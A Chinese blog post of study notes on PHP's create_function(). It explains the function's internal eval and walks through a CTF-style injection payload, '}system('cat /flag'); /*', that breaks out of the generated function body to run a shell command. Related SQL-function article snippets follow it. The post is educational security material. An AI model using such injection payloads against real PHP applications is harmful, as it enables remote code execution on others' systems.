create_function()函数利用

最新推荐文章于 2024-02-22 17:41:57 发布
最新推荐文章于 2024-02-22 17:41:57 发布
阅读量865 收藏 5
点赞数 1
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61785633/article/details/131159553
版权

最近做题发现有利用到这个函数,所以就找了这篇文章学习了一下,并做个笔记

适用范围 : php < 7.2 7.2也有不过会有报错

语法:

create_function(string $args, string $code)
​
string $args   声明的函数变量部分
    
string $code   执行的方法代码部分

用法:

<?php
$newfunc = create_function('$a, $b', 'return "ln($a) + ln($b) = " . log($a * $b)');
echo "New anonymous function: $newfunc \n"
echo $newfunc(2, M_E) . "\n";
?>

 

分析:

create_function函数会创建一个匿名函数。在此处回创建一个叫 lamvda_1的函数,在第一个 echo 中显示名字,并在第二个 echo 语句中执行该函数。

create_function函数会在内部执行eval(),在实现过程中会发现是执行了后面的return语句,它属于create_function()中的第二个参数string $code的位置

因此上面创建的函数等价于:

<?php
function lambda_1($a, $b) {
    return "ln($a) + ln($b) = " . log($a * $b);
}

这个函数在代码审计中也是一个漏洞利用函数

例子

<?php
error_reporting(0);
​
$a = $_GET['a'];
$b = $_GET['b'];
if (preg_match('/^[a-z0-9_]*$/isD', $a)) {
    show_source(__FILE__);
}
else {
    $a('', $b);
}

直接说答案了,我们要传的payload为

a=\create_function&b=}system('cat /flag'); /*

接着我来解释一下这句的意思,以及为什么这么写

首先把相应参数数据传入后,该语句就会变成 \create_function('',"}system('cat /flag'); /*")

首先因为正则的关系,我们不能以字母会数字开头,所以我们可以用\符号开头,它不会影响函数的运行

而转化为create_function创建的函数就会变成

<?php
function lambda_1() {
}system('cat /flag');
/*}

我们用}开头为的就是进行闭合,这样我们可以进行我们想执行的代码,而后面的/*为的是把原本的}符号给注释掉,这样我们就执行了system('cat /flag')函数

wing_let
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL自定义函数(CREATE FUNCTION)
MySQL下载步骤详解(带安装教程)
02-17 240
在使用 MySQL 的过程中,MySQL 自带的函数可能完成不了我们的业务需求,这时候就需要自定义函数。 自定义函数是一种与存储过程十分相似的过程式数据库对象。它与存储过程一样,都是由 SQL 语句和过程式语句组成的代码片段,并且可以被应用程序和其他 SQL 语句调用。 自定义函数与存储过程之间存在几点区别: 自定义函数不能拥有输出参数,这是因为自定义函数自身就是输出参数;而存储过程可...
Oracle 11gR2创建PASSWORD_VERIFY_FUNCTION对应密码复杂度验证函数步骤.doc
09-30
例如,你可以创建一个名为`资源文件名`的配置,设置`FAILED_LOGIN_ATTEMPTS`为10,`PASSWORD_LIFE_TIME`为180天,并且使用`PASSWORD_VERIFY_FUNCTION`指定我们即将创建的验证函数`verify_function_11G`。 ```sql ...
PHP代码 之create_function()函数
snowlyzz的博客
10-05 4141
create_function 详解
mysql 自定义函数create function
最新发布
简单-生活
02-22 1710
自定义函数是一种与存储过程十分相似的过程式数据库对象, 它与存储过程一样,都是由 SQL 语句和过程式语句组成的代码片段,并且可以被应用程序和其他 SQL 语句调用。 自定义函数与存储过程之间存在几点区别:创建并使用自定义函数 使用 CREATE FUNCTION 语句创建自定义函数。 语法格式如下: 存储函数返回table类型,使用mysql v5.7和v8.0都没有验证成功; 一直报以下错误,后续如有进展更新些处; 参考文档:https://blog.51cto.com/u
[php代码审计]之create_function()函数
o3Ev的博客
04-14 1608
[php代码审计]之create_function 这篇文章结合了许多师傅的博客,再加上了一点我自己的心得 文章目录creat_function()介绍使用官方手册使用实际例子0x010x02代码分析参考博客 creat_function()介绍 适用范围:php4>=4.0.1,php5,php7 功能: 根据传递的参数创建匿名函数,并为其返回唯一名称 语法: creat_function(string $agrs,string $code) //string $agrs 声明的函数变量部分 //s
MySQL -> 函数创建(create function),调用(select),查看函数结构(show create function),删除(drop function)
rod0320的博客
11-10 4944
函数创建:create function 无参数的 # 函数的特点,必须有返回值,且返回值只能有一个,返回的时候注意不要返回多行,会赋值不了 # 格式:create function 函数名(参数列表) returns 返回类型 "定义一个函数,返回表的总行数": delimiter $ create function mmp() returns varchar(22)# 只写返回类型就行 begin declare 局部变量 int default 0;# 定义一个局部变量 默认是0 select c
力扣数据库题目:第N高的薪水(中等)
qq_43453731的博客
10-19 333
编写一个 SQL 查询,获取 Employee 表中第 n 高的薪水(Salary)。 Id Salary 1 100 2 200 3 300 例如上述 Employee 表,n = 2 时,应返回第二高的薪水 200。如果不存在第 n 高的薪水,那么查询应返回 null。 getNthHighestSalary(2) 200 代码: CREATE ...
MySQL 自定义函数CREATE FUNCTION示例
12-15
mysql> CREATE FUNCTION myFunction -> (in_string VARCHAR(255), -> in_find_str VARCHAR(20), -> in_repl_str VARCHAR(20)) -> -> RETURNS VARCHAR(255) -> BEGIN -> DECLARE l_new_string VARCHAR(255); -> ...
wm_concat函数DDL.zip
08-06
CREATE OR REPLACE FUNCTION WM_CONCAT (p_val VARCHAR2) RETURN VARCHAR2 PARALLEL_ENABLE AGGREGATE USING WM_CONCAT_IMPL; / CREATE OR REPLACE TYPE WM_CONCAT_IMPL AS OBJECT ( str VARCHAR2(4000), STATIC ...
CREATE FUNCTION sqlserver用户定义函数
09-11
创建用户定义函数,它是返回值的已保存的 Transact-SQL 例程。用户定义函数不能用于执行一组修改全局数据库状态的操作。与系统函数一样,用户定义函数可以从查询中唤醒调用。也可以像存储过程一样,通过 EXECUTE ...
MySQL自定义函数简单用法示例
12-15
本文实例讲述了MySQL自定义函数用法。分享给大家供大家参考,具体如下: 先来一个简单的,创建一个函数将’2009-06-23 00:00:00’这样格式的datetime时间转化为’2009年6月23日0时0分0秒’这样的格式: DELIMITER $$ DROP FUNCTION IF EXISTS `sp_test`.`getdate`$$ CREATE FUNCTION `sp_test`.`getdate`(gdate datetime) RETURNS varchar(255) BEGIN DECLARE x VARCHAR(255) DEFAULT ''; SET x= dat
MS SQL入门基础:用户自定义函数
weixin_34050519的博客
07-27 491
  除了使用系统提供的函数外,用户还可以根据需要自定义函数。用户自定义函数(User Defined Functions)是SQL Server 2000 新增的数据库对象,是SQL Server 的一大改进。   用户自定义函数不能用于执行一系列改变数据库状态的操作,但它可以像系统函数一样在查询或存储过程等的程序段中使用,也可以像存储过程一样通过EXECUTE 命令来执行。用户自定义函数中存储...
create_function() 代码注入,,PHP7.2竟然还存在
烟敛寒林的博客
05-09 1万+
第一部分:php函数 create_function() 介绍 理论: create_function()主要用来创建匿名函数,有时候匿名函数可以发挥它的作用。 stringcreate_function (string$args ,string$code ) string$args变量部分 string$code 方法代码部分 举例: create...
mysql存储过程之存储函数(CREATE FUNCTION)
luyaran的博客
07-10 3962
之前提到过好多次存储函数,这次咱们就来具体看下。它呢,是返回单个值的特殊类型的存储程序。我们通常使用存储的函数来封装在SQL语句或存储的程序中可重用的常用公式或业务规则。与存储过程不同,我们可以在SQL语句中使用存储的函数,也可以在表达式中使用, 这有助于提高程序代码的可读性和可维护性。我们来看下创建新存储函数的最简单语法:CREATE FUNCTION function_name(param1,...
PHP中create_function的用法总结
azzfanke的专栏
12-22 7784
在php中,函数create_function主要用来创建匿名函数,有时候匿名函数可以发挥它的作用。 1.测试一 测试一主要用来循环替换数组中多个值的,我们用array_map加上create_function解决这个问题。 ############################################### function filterChars($a) {
PostgreSQL创建函数(CREATE FUNCTION)
热门推荐
我生活的点滴
09-19 4万+
NameCREATE FUNCTION -- 定义一个新函数Synopsis CREATE [ OR REPLACE ] FUNCTION    name( [ [argmode] [argname]argtype[ { DEFAULT | = }default_expr] [, ...] ] )         [ RETURNSrettype           | RETURNS T
python3.8 sqlite3的使用
Qwertyuiop2016的博客
03-22 2559
简单使用 接口和pymysql基本一样 import sqlite3 con = sqlite3.connect('example.db') cur = con.cursor() cur.execute('''CREATE TABLE stocks (date text, trans text, symbol text, qty real, price real)''') cur.execute("INSERT INTO stocks VALUES ('2006-01-05'
MySQL之数据库编程(创建存储函数&&设置触发器)
遇安的博客
08-22 2746
存储函数也是过程式对象之一,与存储过程相似。他们都是由SQL和过程式语句组成的代码片段,并且可以从应用程序和SQL中调用。然而,他们也有一些区别: 1、存储函数没有输出参数,因为存储函数本身就是输出参数。 2、不能用CALL语句来调用存储函数。 3、存储函数必须包含一条RETURN语句,而这条特殊的SQL语句不允许包含于存储过程中
PostgreSQL函数的创建和使用大全
qq_28245087的博客
07-03 6627
打开PostgreSQL客户端,可以使用命令行工具(如psql)或图形界面工具(如pgAdmin)。使用语句创建函数,指定函数名称、参数列表和返回类型。例如:sqlCREATE FUNCTION function_name(parameter1 datatype , parameter2 datatype) RETURNS return_type AS $$ -- 函数体 $$ LANGUAGE language_name;:您要创建的函数的名称。parameter1和parameter2。
pthread_create函数样例
04-26
pthread_create函数的样例如下: ``` #include <pthread.h> #include <stdio.h> void* print_thread_function(void* arg) { int thread_id = *(int*)arg; printf("Hello from thread %d!\n", thread_id); return NULL; } int main() { pthread_t thread_id; int arg = 1; pthread_create(&thread_id, NULL, print_thread_function, &arg); printf("Hello from main thread!\n"); pthread_join(thread_id, NULL); return 0; } ``` 该样例中,主线程创建了一个新的线程,并通过pthread_create函数启动该线程,该线程调用了print_thread_function函数,主线程则继续执行。在print_thread_function函数中,该线程输出了一条信息,指明该线程是哪个线程。最后,主线程通过pthread_join函数等待该线程执行完毕。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值